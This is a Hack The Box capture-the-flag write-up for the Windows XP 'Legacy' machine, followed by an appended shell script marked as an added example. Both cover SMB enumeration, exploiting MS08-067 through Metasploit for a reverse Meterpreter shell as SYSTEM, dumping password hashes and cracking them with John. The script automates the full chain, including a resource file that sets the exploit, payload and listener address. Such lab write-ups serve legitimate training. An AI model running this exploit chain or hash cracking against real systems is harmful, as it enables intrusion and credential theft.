LEGACY ON HTB (EASY)

Allen
Jan 17, 2021
The IP address of the machine is shown if you hover over the machine's name. 10.10.10.4 is the Legacy machine's IP address. We see that 139 and 445 are open, so we can look for SMB shares on those ports.
Unable to get in with smbclient (note that smbclient only lists and browses shares; it does not give a shell).
Went to Metasploit and checked the SMB version with the auxiliary/scanner/smb/smb_version scanner.
Once we found out what the host was running (Windows XP SP3), I ended up googling "Windows XP SP3 exploit".
Clicked the first link, which was Rapid7's module page.
Found the exploit MS08-067 (exploit/windows/smb/ms08_067_netapi, a stack overflow in the Server service's NetAPI32 path canonicalization that is reachable over SMB). Use this exploit to gain a shell.
Make sure LHOST is the address of the VPN interface connected to the vulnerable box (tun0 or tap0), not your LAN address, or the reverse shell will never come back to the handler.
We are able to generate a shell.
We are able to further enumerate with getuid / sysinfo / help. Because MS08-067 runs inside the Server service, getuid shows NT AUTHORITY\SYSTEM, so there is no separate privilege escalation step on this box.
From here you could use hashdump to get the password hashes for the listed users. John the Ripper would be a good tool to crack them (hashdump output is user:rid:LM:NT:::, so use john --format=NT or --format=LM).
Pop a shell (the shell command) or navigate through Meterpreter directly.
Navigate through the shell for the user and root flags.
Found the user flag under the user "john", in the user.txt file on the Desktop (on XP that is under C:\Documents and Settings\john\Desktop).
Admin flag found in the root.txt file on the Desktop of the Administrator user.
Copy and paste the flag, then click the flag icon under Actions. Make sure to select a difficulty when prompted or you will get an error.
Same thing for the admin flag.
In this box we scanned 10.10.10.4 and found SMB ports 139/445 open. Once we saw we did not have access with smbclient, we did further enumeration with the Metasploit scanner. We discovered the device was running Windows XP SP3 and googled the exploit, MS08-067, to get a shell.
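The steps above, pulled together into one helper script. This is an added example, not the author's code or anything from the write-up: the target 10.10.10.4, the Metasploit modules and the flag locations come from the post; the VPN interface name (tun0), the wordlist path, the output file names and the constructed nmap sample are assumptions. The exploit step is gated on the nmap output actually showing 139/445 open, and LHOST is read from the tunnel interface rather than typed by hand.

```shell
#!/bin/sh
# Added helper for the Legacy workflow (not the write-up author's code).
# Target 10.10.10.4 comes from the post; VPN_IF, WORDLIST and the file names are assumptions.
set -eu

TARGET="${TARGET:-10.10.10.4}"
VPN_IF="${VPN_IF:-tun0}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Constructed sample of nmap -oG (grepable) output, used to exercise smb_open_ports offline.
SAMPLE_GNMAP='Host: 10.10.10.4 () Status: Up
Host: 10.10.10.4 () Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// Ignored State: filtered (997)'

# Read nmap -oG output on stdin; print whichever of 139/445 are open, space separated.
smb_open_ports() {
  grep -o '[0-9][0-9]*/open/tcp' | cut -d/ -f1 | grep -E '^(139|445)$' | paste -sd' ' -
}

# Address on the VPN interface. LHOST must be this: the reverse shell from
# 10.10.10.4 can only reach you through the tunnel, never via your LAN address.
vpn_ip() {
  ip -4 -o addr show dev "$VPN_IF" | awk '{print $4}' | cut -d/ -f1
}

# Confirm OS/version and check for MS08-067 before firing the exploit.
# (smb-vuln-ms08-067 is a check, not the exploit, but XP is fragile: scan once.)
scan() {
  nmap -p139,445 --script smb-os-discovery,smb-vuln-ms08-067 -oG legacy.gnmap "$TARGET"
}

# Write a Metasploit resource script: version scan, then ms08_067_netapi with LHOST on the VPN.
write_msf_rc() {  # usage: write_msf_rc TARGET LHOST OUTFILE
  cat > "$3" <<EOF
use auxiliary/scanner/smb/smb_version
set RHOSTS $1
run
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $1
set LHOST $2
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
EOF
}

# Crack saved hashdump lines (user:rid:LM:NT:::) with John: NT hashes first, then LM if any.
crack_hashes() {  # usage: crack_hashes HASHFILE
  john --format=NT --wordlist="$WORDLIST" "$1"
  john --format=LM --wordlist="$WORDLIST" "$1" || true
}

# Only touch the network when invoked as "./legacy.sh run"; otherwise just define the functions.
if [ "${1:-}" = "run" ]; then
  scan
  open=$(smb_open_ports < legacy.gnmap)
  [ -n "$open" ] || { echo "SMB (139/445) not open on $TARGET; nothing to exploit"; exit 1; }
  write_msf_rc "$TARGET" "$(vpn_ip)" legacy.rc
  msfconsole -q -r legacy.rc
  # In the Meterpreter session: getuid, sysinfo, then hashdump (copy its lines into hashes.txt
  # on the attacking box and run crack_hashes hashes.txt), then
  # cat "C:\\Documents and Settings\\john\\Desktop\\user.txt" and the Administrator's root.txt.
fi
```

Run it as `./legacy.sh run` from a box connected to the HTB VPN; with no argument it only defines the functions. The one thing people get wrong on this box is LHOST: if it is set to the LAN or default-route address, the overflow still lands on 10.10.10.4 but the reverse Meterpreter connection never reaches the handler, which looks exactly like a failed exploit.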


Allen

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the eCPPTv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.